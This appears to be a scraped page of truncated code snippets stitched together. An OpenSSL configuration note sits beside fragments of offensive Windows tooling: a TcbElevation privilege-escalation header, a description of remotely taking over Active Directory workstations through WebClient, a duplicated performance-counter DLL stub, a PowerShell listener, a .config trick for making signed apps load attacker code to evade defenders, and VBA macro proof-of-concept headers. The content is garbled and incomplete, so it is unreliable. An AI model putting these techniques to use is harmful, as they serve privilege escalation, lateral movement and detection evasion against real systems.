This is a minimal /etc/ssl/openssl.cnf supporting legacy algorithms on modern openssl installations
where it is disabled by default.
The marked (######) lines should be added to your openssl.cnf (other parts may be unchanged).
For checking if legacy providers are enabled successfully:
$ openssl list -providers
Providers:
| // TcbElevation - Authors: @splinter_code and @decoder_it | |
| #define SECURITY_WIN32 | |
| #include <windows.h> | |
| #include <sspi.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "Secur32.lib") | |
| void EnableTcbPrivilege(BOOL enforceCheck); |
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
| #include <iostream> | |
| #include <Windows.h> | |
| #include <Lmcons.h> // UNLEN + GetUserName | |
| #include <tlhelp32.h> // CreateToolhelp32Snapshot() | |
| #include <strsafe.h> | |
| extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext); | |
| extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned); | |
| extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData(); |
| #include <iostream> | |
| #include <Windows.h> | |
| #include <Lmcons.h> // UNLEN + GetUserName | |
| #include <tlhelp32.h> // CreateToolhelp32Snapshot() | |
| #include <strsafe.h> | |
| extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext); | |
| extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned); | |
| extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData(); |
| Param( | |
| [Parameter(Mandatory, Position = 0)] | |
| [string]$HostDrive, | |
| [Parameter(Mandatory, Position = 1)] | |
| [string]$LocalDrive | |
| ) | |
| # Script to map a host drive inside a Windows Docker Server Container | |
| # You need to be an admin in the container for this to work. | |
| # Use as .\map_host_drive C: X: |
| $Global:Listener = [HashTable]::Synchronized(@{}) | |
| $Global:CnQueue = [System.Collections.Queue]::Synchronized((New-Object System.collections.queue)) | |
| $Global:space = [RunSpaceFactory]::CreateRunspace() | |
| $space.Open() | |
| $space.SessionStateProxy.setVariable("CnQueue", $CnQueue) | |
| $space.SessionStateProxy.setVariable("Listener", $Listener) | |
| $Global:newPowerShell = [PowerShell]::Create() | |
| $newPowerShell.Runspace = $space |
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
| ' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled | |
| ' by @_xpn_ | |
| ' | |
| ' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro | |
| Const EXTENDED_STARTUPINFO_PRESENT = &H80000 | |
| Const HEAP_ZERO_MEMORY = &H8& | |
| Const SW_HIDE = &H0& | |
| Const MAX_PATH = 260 | |
| Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007 |
| ' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb | |
| Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long | |
| Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr) | |
| Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr | |
| #If Win64 Then | |
| Const LS As LongPtr = 8& | |
| #Else | |
| Const LS As LongPtr = 4& |